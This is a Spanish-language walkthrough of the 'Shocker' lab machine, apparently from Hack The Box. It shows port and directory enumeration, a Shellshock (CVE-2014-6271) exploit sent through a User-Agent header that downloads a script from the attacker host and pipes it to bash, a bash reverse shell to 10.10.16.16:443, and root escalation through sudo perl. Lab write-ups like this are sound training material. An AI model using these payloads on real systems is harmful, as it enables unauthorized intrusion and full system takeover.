Shocker
Skills
- ShellShock Attack (User-Agent)
- Abusing Sudoers Privilege (Perl)
Certificaciones
- eJPT
- eWPT
Descripción
Shocker es una máquina easy linux, fuzzearemos en busca de rutas y encontraremos un /cgi-bin a partir del cual explotaremos un ShellShock Attack y ganaremos acceso a la máquina víctima. Escalaremos privilegios abusando del sudoers convirtiéndonos en usuario root
Reconocimiento
Se comprueba que la máquina está activa y se determina su sistema operativo, el ttl de las máquinas linux suele ser 64, en este caso hay un nodo intermediario que hace que el ttl disminuya en una unidad
1
2
3
4
5
6
7
8
# ping 10.129.198.109
PING 10.129.198.109 (10.129.198.109) 56(84) bytes of data.
64 bytes from 10.129.198.109: icmp_seq=1 ttl=63 time=60.4 ms
64 bytes from 10.129.198.109: icmp_seq=2 ttl=63 time=57.4 ms
^C
--- 10.129.198.109 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 57.399/58.904/60.410/1.505 ms
Nmap
Se va a realizar un escaneo de todos los puertos abiertos en el protocolo TCP a través de nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# sudo nmap -p- --open --min-rate 5000 -sS -n -Pn -v 10.129.198.109 -oG openPorts
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-12 23:59 CEST
Initiating SYN Stealth Scan at 23:59
Scanning 10.129.198.109 [65535 ports]
Discovered open port 80/tcp on 10.129.198.109
Discovered open port 2222/tcp on 10.129.198.109
Completed SYN Stealth Scan at 23:59, 13.48s elapsed (65535 total ports)
Nmap scan report for 10.129.198.109
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.62 seconds
Raw packets sent: 66041 (2.906MB) | Rcvd: 66041 (2.642MB)
Se procede a realizar un análisis de detección de servicios y la identificación de versiones utilizando los puertos abiertos encontrados
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# nmap -sCV -p80,2222 10.129.198.109 -oN services
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-12 23:59 CEST
Nmap scan report for 10.129.198.109
Host is up (0.078s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.01 seconds
Web Enumeration
Lo primero que vemos es lo siguiente
Como el título de la máquina es Shocker, me hace pensar que puede haber un ShellShock Attack, así que vamos a fuzzear
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# wfuzz -c -t100 --hc 404 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt http://10.129.198.109/FUZZ/
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.129.198.109/FUZZ/
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 9 L 13 W 137 Ch "# directory-list-2.3-medium.txt"
000000002: 200 9 L 13 W 137 Ch "#"
000000035: 403 11 L 32 W 297 Ch "cgi-bin"
000000007: 200 9 L 13 W 137 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000005: 200 9 L 13 W 137 Ch "# This work is licensed under the Creative Commons"
000000083: 403 11 L 32 W 295 Ch "icons"
000000004: 200 9 L 13 W 137 Ch "#"
000000006: 200 9 L 13 W 137 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000008: 200 9 L 13 W 137 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000009: 200 9 L 13 W 137 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000010: 200 9 L 13 W 137 Ch "#"
000000011: 200 9 L 13 W 137 Ch "# Priority ordered case-sensitive list, where entries were found"
000000012: 200 9 L 13 W 137 Ch "# on at least 2 different hosts"
000000013: 200 9 L 13 W 137 Ch "#"
000000014: 200 9 L 13 W 137 Ch "http://10.129.198.109//"
000000003: 200 9 L 13 W 137 Ch "# Copyright 2007 James Fisher"
Hemos encontrado el directorio /cgi-bin, ahora vamos a ver si hay algún archivo en ese directorio
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# dirsearch -u http://10.129.198.109/cgi-bin -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e cgi,pl,py,sh -f
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: cgi, pl, py, sh | HTTP method: GET | Threads: 25 | Wordlist size: 1323270
Output File: /home/justice-reaper/Desktop/Shocker/nmap/reports/http_10.129.198.109/_cgi-bin_24-07-13_01-07-13.txt
Target: http://10.129.198.109/
[01:07:13] Starting: cgi-bin/
[01:07:17] 200 - 118B - /cgi-bin/user.sh
Con nmap podemos confirmar que la web es vulnerable a un ShellShock Attack
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# nmap 10.129.198.109 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/user.sh
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-13 01:09 CEST
Nmap scan report for 10.129.198.109
Host is up (0.077s latency).
PORT STATE SERVICE
80/tcp open http
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known
| as Shellshock. It seems the server is executing commands injected
| via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| References:
| http://www.openwall.com/lists/oss-security/2014/09/24/10
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|_ http://seclists.org/oss-sec/2014/q3/685
Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds
Web Exploitation
Le hacemos una petición a esa ruta y capturamos la petición con Burpsuite y esto es lo que obtenemos
Ahora con el comando curl vamos a explotar el ShellShock, lo primero es crearnos un archivo shell.sh con este payload
1
bash -i >& /dev/tcp/10.10.16.16/443 0>&1
Nos ponemos en el mismo directorio en el que está el archivo shell.sh en escucha con python
1
# python -m http.server 80
Con netcat nos ponemos en escucha por el puerto 443
1
# nc -nlvp 443
Ejecutamos el comando con curl para obtener una shell, este payload lo podemos encontrar en https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/cgi
1
# curl -H 'User-Agent: () { :; }; /bin/bash -c "curl http://10.10.16.16/shell.sh | bash"' http://10.129.198.109/cgi-bin/user.sh
Si todo ha ido bien deberíamos haber obtenido una shell, ahora vamos a hacer un tratamiento a la TTY
1
2
3
4
5
6
# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.16.16] from (UNKNOWN) [10.129.198.109] 54964
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
shelly
Obtenemos las dimensiones de nuestra pantalla
1
2
# stty size
45 183
Efectuamos el tratamiento a la TTY
1
2
3
4
5
6
7
8
9
10
11
12
13
# script /dev/null -c bash
[ENTER]
[CTRL + Z]
# stty raw -echo; fg
[ENTER]
# reset xterm
[ENTER]
# export TERM=xterm
[ENTER]
# export SHELL=bash
[ENTER]
# stty rows 45 columns 183
[ENTER]
Privilege Escalation
Con este usuario tenemos privilegios como sudo
1
2
3
4
5
6
shelly@Shocker:/home/shelly$ sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
Ya nos hemos convertido en usuario root, este payload es de https://gtfobins.github.io/gtfobins/perl/#sudo
1
2
3
shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/bash";'
root@Shocker:/home/shelly# whoami
root